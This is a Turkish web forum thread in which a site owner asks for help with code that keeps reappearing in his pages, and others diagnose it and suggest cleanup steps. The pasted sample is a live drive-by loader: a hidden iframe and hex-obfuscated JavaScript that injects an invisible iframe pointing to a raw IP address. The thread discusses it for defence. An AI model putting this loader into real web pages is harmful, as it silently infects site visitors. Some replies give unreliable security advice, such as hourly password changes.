Bu Nasıl Bir Trojan!!!

[mircalem]

Arkadaşlar web sayfamda kendilinden iframe şeklinde kodlar ekleniyor. sabah siliyorum 3 4 saat sonra bakıyorum gene eklenmiş sayfada java lı toplist olarak sadece webservis var. bu beladan nasıl kurtulabilirim. kodu ekliyorum

HTML-Kodu:

<BODY bottomMargin=0 leftMargin=0 topMargin=0 rightMargin=0><iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v476512d734cd4(v476512d7354cf){ var v476512d735cc6=16; return(parseInt(v476512d7354cf,v476512d735cc6));}function v476512d7369c9(v476512d736cb9){ function v476512d737904 () {var v476512d737cac=2; return v476512d737cac;} var v476512d7370b2='';for(v476512d7374af=0; v476512d7374af<v476512d736cb9.length; v476512d7374af+=v476512d737904()){ v476512d7370b2+=(String.fromCharCode(v476512d734cd4(v476512d736cb9.substr(v476512d7374af, v476512d737904()))));}return v476512d7370b2;} document.write(v476512d7369c9('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D3934207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3635313930292B2739333539303336323263325C272077696474683D313539206865696768743D343130207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>

[nokie]

bu kodu derhal o sayfadan kaldır, ziyaretçilerine trojan download ettiriyor başka bir serverdan, biri serverına erişmiş.

malware bu, serverındaki tüm index.* adlı dosyaları otomatik yerleştiriyor kendini.

serverını olası exploitlere karşı tarama yap, /dev/shm, /tmp, /usr/local/apache/proxy , /var/spool, /var/tmp dizinlerine perl script olarak bulaşıyor.

ayrıca bilgisayarınıda full virüs taramasından geçirmeni tavsiye ederim, kullandığın web editörlerine kadar bulaştırıyor kendini (notepad, ultraedit, dreamweaver v.b.) dosyayı kaydet dediğinde sayfanın en altına ekleniyor kod otomatik.

Yapacağın işlemler:

1. Serverına eriş, /dev/shm, /tmp, /usr/local/apache/proxy , /var/spool, /var/tmp dizinlerini korumaya al ve dizinler içindeki olası exploitleri tespit edip temizle.

2. Site için klasör ve dosya yazma izinlerini kontrol et (chmod 0777 olmamalı)

3. Siteye ait ftp şifresini değiştir.

4. Serverda bulunan tüm index adlı dosyalardan trojan javascript kodunu temizle.

5. Kodun bulunduğu siteye girdiysen bilgisayarını full antivirüs taraması yaptır, bilgisayarına bulaşan malware'i temizle.

6. php_safe_mode aktif et.

7. sitende klasöre yazma ihtiyacı duyan yazılımlar varsa, klasörleri dışardan erişilmeyen bir yere taşı (public_html dışına, script yine çalışır) bu sayede chmod0777 guvenle kullanabilirsin.

8. siten için tüm alt klasörleri sh, .pl, cgi v.b. dosyalarının dışardan çalıştırılmaya kapat, htaccess ile bunu yapabilirsin.

9. server root ve normal kullanıcı şifrelerini değiştir.

10. son olarak serverını bütüyle elegeçirmiş olabileceğini düşünüyorsan bir sistem yöneticisine başvur.

[Loi]

Kaspersky ne bu dosyalari bilgisayariniza bulastiriyor nede bunlardan geriye birsey birakiyor. Kaspersky kullaniniz.

[mircalem]

tşk ederim arkadaşım hostcuya ileticem bunları benim bilgisayarımda böle bişey yok tüm indexleri kotrol ettim ama sunucuya attımda 2 saat sonra indexte kendilinden ekli görüyom kodu. sanırım sunucuda var bu hostcuya durumu anlatayım. saol

[Loi]

Alıntı:

mircalem´isimli üyeden Alıntı

tşk ederim arkadaşım hostcuya ileticem bunları benim bilgisayarımda böle bişey yok tüm indexleri kotrol ettim ama sunucuya attımda 2 saat sonra indexte kendilinden ekli görüyom kodu. sanırım sunucuda var bu hostcuya durumu anlatayım. saol

Zaten sende var oldugu gozukmuyor(ama var) Hostcundan once kendi bilgisayarini duzeltmelisin.

[mathiaxbars]

bilgisayarındaki dosyalarda olmadığına eminmisin eğer bildiğim şeyse bu virüs zipteki dosyyaların hariç bütün sayfalara iframe kodları atıyor değilse yeni bir şey galiba

[nokie]

Alıntı:

mircalem´isimli üyeden Alıntı

tşk ederim arkadaşım hostcuya ileticem bunları benim bilgisayarımda böle bişey yok tüm indexleri kotrol ettim ama sunucuya attımda 2 saat sonra indexte kendilinden ekli görüyom kodu. sanırım sunucuda var bu hostcuya durumu anlatayım. saol

servera yerleştiğinden zamanlama olarak belli bir süre zarfında sunucuda bulunan tüm hesaplardaki index.* adlı dosyalara kodu ekliyor otomatik.

sunucu sahibi exploiti temizlemesi gerek makineden.

[ogranver]

Evet benim başımada gelişti. Birçok arkadaş bilir ve beni onlar uyardı. Kaspersky kullanmıyordum. Diğerlerinde de sorun yoktu. Bilgisayarım temizdi fakat sanırsam bir internet hırsızı (Hacker) dadanmış. Şimdi 1 saatte bir şifre yeniliyorum.

Sende eğer bu konuda bir hackerdan şüphe ediyorsan hemen şifreleri değiştir ve hosting firmanla temasa geç.

Saygılarımla;
Oğuzhan FELEK

[Ece]

Bu vürüs trojen hemen hemen çok sitelerde çıkmaya başladı birileri ilginç bir şekilde trojen yayıyor. Genelde yeni başlıyan veya güvendigi siteye girdiginde başına gelen birşey ben 3 gün içinde 19 trojen leptop da 11 vürüs masa üstü bilgisayarımda rast geldim loi nin dedigi kaspersky programını kullanın bulup siliyor. Fakat her yere fazla güvenmeyin artık derim.

[ogranver]

Evet doğru söylüyorsun, benim de başımdan geçti açıkçası. Zor kurtuldum ama her an olacakmış gibi de tetikteyim. Şifrelere dikkat edin bence. Tahminen 2 saatten önce çözülmüyor kısa şifreler. Bu yüzden uzun şifre kullanın ve mutlaka günlük değiştirin.

Kaspersky kullanmanızı tavsiye ederim. Diğerlerinde pek gözükmüyor çünkü. Bende kullanmıyordum ama kullanmaya başlayınca anladım zaten trojanı.

Tüm arkadaşlara iyi çalışmalar dilerim...